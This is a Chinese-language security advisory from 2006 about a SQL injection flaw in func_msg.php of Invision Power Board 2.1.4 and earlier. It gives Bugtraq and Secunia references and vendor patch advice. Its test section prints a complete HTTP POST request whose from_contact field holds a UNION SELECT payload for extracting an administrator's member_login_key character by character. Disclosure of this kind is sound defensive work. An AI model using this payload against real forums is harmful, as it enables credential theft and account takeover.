Invision Power Board func_msg.php远程SQL注入漏洞
发布日期:2006-04-28
更新日期:2006-04-28
受影响系统:Invision PS Invision Board <= 2.1.4
描述:
BUGTRAQ ID:
17719
Invision Power Board是一款流行的PHP论坛程序。
Invision Power Board的func_msg.php第448行存在SQL注入漏洞。to_by_id没有经过正确的过滤便通过messenger类实例从ipd过滤的输入数组传送给了类,因此攻击者可以操控SQL查询,执行任意代码。
<*来源:satanchild123 (
satanchild123@hotmail.com)
链接:
http://secunia.com/advisories/19861/print/
http://marc.theaimsgroup.com/?l=bugtraq&m=114617008006860&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Host: localhost
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060405 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en,en-us;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
http://www.example.com/ipb/index.php?act=msg
Cookie: bbmode=0; member_id=1; forum_read=a%3A1%3A%7Bi%3A2%3Bi%3A1146068785%3B%7D; pass_hash=c0a4d27ac2c36ef6fe25d27c5c0f3b17;
session_id=9dd0de2c068478414d8e7bae7790ce46; ipb-myass-div=310,109
Content-Type: application/x-www-form-urlencoded
Content-Length: 438
removeattachid=0&OID=&act=Msg&CODE=04&MODE=01&post_key=1f40fdcbdc94fc9c1a402e2019f2b314&auth_key=bcb2b3362c8fa575e58cd376ab4fb6be&MAX_FILE_SIZE=51200000&
entered_name=asdfasdfasdf&carbon_copy=&msg_title=asdfasdfasdf&ffont=0&fsize=0&Post=asdfasdfasdfasdfasdf&from_contact=-1+UNION+SELECT+0%2C+CHAR%28110%2C11
7%2C116%2C105%2C99%2C117%2C108%2C117%2C115%29+FROM+ibf_members+WHERE+id%3D1+AND+MID%28member_login_key%2C+2%2C+1%29+%3D+CHAR%2848%29
建议:
厂商补丁:
Invision PS
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.invisionboard.com/浏览次数:4317
严重程度:0(网友投票)